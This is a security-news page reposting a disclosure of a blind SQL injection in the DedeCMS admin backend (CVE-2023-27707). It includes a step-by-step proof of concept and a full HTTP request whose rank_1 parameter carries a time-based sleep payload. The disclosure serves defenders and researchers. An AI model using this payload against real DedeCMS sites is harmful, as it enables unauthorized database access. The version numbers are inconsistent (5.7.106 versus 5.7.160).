Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-27707: DedeCMS V5.7.160 Backend Blind SQL Injection

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dede/group_store.php endpoint.

CVE
#sql#csrf#vulnerability#web#mac#apple#intel#php#chrome#webkit

Description

Admin backend group store blind SQL injection via post parameters.

Affected Version

DedeCMS <= 5.7.160

POC

  1. Login to admin backend management.
  2. Request to /dede/group_store.php with GET parameter action=uprank and POST parameters rank_1=1’+and+sleep(3)+and+’1, this payload will lead to a time-based SQL injection.
  3. In the source code of /dede/group_store.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1
2
3
4
5
6
7
8
9
10
11
12
13

POST /cms/dedecms/dede/group_store.php?action=uprank HTTP/1.1
Host: 192.168.0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; _csrf_name_273c7533=e59946ea73ad488a9da6a03897480ac5; _csrf_name_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup_store.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

rank_1=1’+and+sleep(3)+and+’1

Reference

Reported by Srpopty, vulnerability discovered by using Corax.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907